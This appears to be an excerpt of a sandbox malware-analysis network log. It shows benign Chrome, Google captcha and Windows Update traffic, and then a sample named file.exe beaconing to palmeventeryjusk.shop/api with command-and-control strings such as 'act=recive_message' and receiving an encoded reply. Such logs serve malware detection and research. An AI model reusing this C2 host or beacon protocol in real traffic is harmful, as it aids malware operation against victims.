2024-04-27 11:26:04 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 3f 61 73 79 6e 63 3d 6e 74 70 3a 32 3c 2f 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/ddljson?async=ntp:2</title>
2024-04-27 11:26:04 UTC	1255	IN	Data Raw: 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 45 6c 4c 55 71 61 72 64 69 65 6c 54 35 78 55 41 55 56 46 61 54 4d 71 39 48 4f 4f Data Ascii: tCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="ElLUqardielT5xUAUVFaTMq9HOO
2024-04-27 11:26:04 UTC	977	IN	Data Raw: 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e Data Ascii: ears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the mean

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	142.251.32.100	443	7008	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:04 UTC	912	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgSaEMC5GMvBs7EGIjCXTsQ7Hz4Kgfi-FiRAT51_6pwZM6lLrAZbawdcw8AX8hoRf91oiReOlMqAgZsqCfUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-27-11; NID=513=kQC6D8SRkrtcp-Ak6hN6139KekVx3zhnDsBO5DsiJ9YDbwqMQ-N6a3Hqkivy0PHw9-eJ3x5r-5xCo2gnEOvmH3O-kQW_B1fyt7z_Em-HG3Cqp_wm97L3ppdQcG3KIgiluTIZwHftN_crK6YXUFLhYGNC9lJOV9dEbrQYPTrEHbs
2024-04-27 11:26:04 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Sat, 27 Apr 2024 11:26:04 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3185 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-27 11:26:04 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-04-27 11:26:04 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 45 37 34 64 61 77 61 76 64 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="E74dawavd
2024-04-27 11:26:04 UTC	1031	IN	Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49740	142.251.32.100	443	7008	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:04 UTC	738	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgSaEMC5GMvBs7EGIjA2UZwTDI9cbxIwnZske8EIQMZhE-XvCbuuLKQiNeKFWQoRwO1bxpkt2MlsnyAfg3kyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-27-11; NID=513=N_zXEKVcGFSmGJnnf9NfxUQYajfRVtbCJ2yy8YIqZG0n-IE-5-6CcuJsdzHS69fS5Lo6qU6l4YiUp_b7kTJjGJdJDpCMMHkYMxbQvY6bAP4YLsOZcW5Y3kKcK6142ycJULOhE9dA5VMjK3BqAAFXra6F2xBdQGomvF0oNwd5oGw
2024-04-27 11:26:05 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Sat, 27 Apr 2024 11:26:05 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3113 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-27 11:26:05 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-04-27 11:26:05 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 56 37 55 45 41 77 68 47 4f 61 76 76 54 75 65 6f 6b 58 33 6c 77 43 31 42 53 65 4b 68 38 38 51 76 65 Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="V7UEAwhGOavvTueokX3lwC1BSeKh88Qve
2024-04-27 11:26:05 UTC	959	IN	Data Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	23.51.58.94	443

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:13 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-27 11:26:13 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/073D) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=243446 Date: Sat, 27 Apr 2024 11:26:13 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49745	23.51.58.94	443

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:14 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-27 11:26:14 UTC	456	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/0778) X-CID: 11 Cache-Control: public, max-age=243454 Date: Sat, 27 Apr 2024 11:26:14 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-27 11:26:14 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:15 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=HaV2Hha+omFEa1E&MD=EgGFr8F4 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-27 11:26:15 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 3b3ba63b-0270-4e5f-a88a-3a8beac94116 MS-RequestId: 2092d1db-b18c-4aaa-8146-39b587eb3df1 MS-CV: G7uCbAx8IUKf2ZzG.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sat, 27 Apr 2024 11:26:15 GMT Connection: close Content-Length: 24490
2024-04-27 11:26:15 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-04-27 11:26:15 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49751	172.67.155.93	443	6884	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:23 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: palmeventeryjusk.shop
2024-04-27 11:26:23 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-04-27 11:26:24 UTC	804	IN	HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 11:26:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=66pmlu102rub9j7cf5hqhrq0kn; expires=Wed, 21-Aug-2024 05:13:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vzHN9v44jTt3mTszi15GjbDmFwAeyDPyLH9BhXQtWiLhgAb%2F7LX4TZuC0jpuBwyEseVT8zTJseppybZVTFJ2h3jJoWQ85uWJ6BiluyQKPAGZKEalGenoCt8RnxS31MuUU%2BTc9BWLpYc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87ae751658210f5d-EWR alt-svc: h3=":443"; ma=86400
2024-04-27 11:26:24 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-04-27 11:26:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49752	172.67.155.93	443	6884	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:25 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 51 Host: palmeventeryjusk.shop
2024-04-27 11:26:25 UTC	51	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 70 47 6c 4d 4d 6e 2d 2d 71 62 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=pGlMMn--qb&j=default
2024-04-27 11:26:25 UTC	812	IN	HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 11:26:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dk40ln5fr4il2hhbovcniqln7u; expires=Wed, 21-Aug-2024 05:13:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ebTTtyWutKdQLRn8V2%2FtLn4xwTbaObenGagpbMU1CsR%2BzWGYq9nqiX16KgjiCjwOtxi%2FQbNAOgx7V7S3N%2B89AWxvfW%2BE44DKjbV2O0V40g2jlX1IkMu8cGowsd3HCwO11MGc9s%2Fanrc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87ae751fdc6f41af-EWR alt-svc: h3=":443"; ma=86400
2024-04-27 11:26:25 UTC	557	IN	Data Raw: 34 66 66 0d 0a 79 4c 62 34 35 4a 45 32 76 68 59 67 74 45 54 53 37 68 68 73 70 79 6b 4f 58 50 48 2f 49 4f 4a 73 4c 61 73 6a 31 53 6f 74 48 32 75 7a 76 50 48 47 35 78 53 45 4e 68 53 59 54 74 76 4d 61 77 6d 46 45 79 34 6f 67 34 70 46 7a 6d 59 6b 69 55 4b 78 43 42 63 2f 44 61 6e 61 69 34 47 39 50 4c 63 30 54 63 78 6d 36 4d 35 44 5a 71 35 53 42 46 58 34 33 55 57 4d 54 68 65 4c 41 61 4a 50 54 33 6f 54 76 4e 4f 57 6c 2f 68 5a 30 46 5a 4e 30 54 43 7a 67 33 6b 66 7a 41 64 6e 4d 39 50 54 4b 75 74 6c 44 38 35 5a 39 78 41 4e 50 53 61 74 77 70 6d 70 38 45 58 56 4e 41 79 2b 54 64 76 4d 66 52 69 46 45 79 35 2b 72 64 31 51 67 78 35 4d 78 6c 43 4a 43 42 64 6b 4e 2b 72 66 6a 49 48 6a 56 38 70 2f 54 39 6f 33 6a 73 77 69 57 70 63 5a 50 6d 7a 42 67 67 4c 6f 5a 56 43 68 4b 6f Data Ascii: 4ffyLb45JE2vhYgtETS7hhspykOXPH/IOJsLasj1SotH2uzvPHG5xSENhSYTtvMawmFEy4og4pFzmYkiUKxCBc/Danai4G9PLc0Tcxm6M5DZq5SBFX43UWMTheLAaJPT3oTvNOWl/hZ0FZN0TCzg3kfzAdnM9PTKutlD85Z9xANPSatwpmp8EXVNAy+TdvMfRiFEy5+rd1Qgx5MxlCJCBdkN+rfjIHjV8p/T9o3jswiWpcZPmzBggLoZVChKo
